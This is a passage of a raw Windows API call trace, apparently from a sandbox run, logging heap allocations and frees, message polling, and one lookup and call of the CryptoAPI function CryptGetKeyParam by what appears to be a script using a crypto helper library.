RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.846] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0113.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.846] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.847] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.848] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0113.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.848] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0113.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0113.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0113.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0113.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0113.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0113.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.852] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0113.852] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e28d0, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e28d0*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree 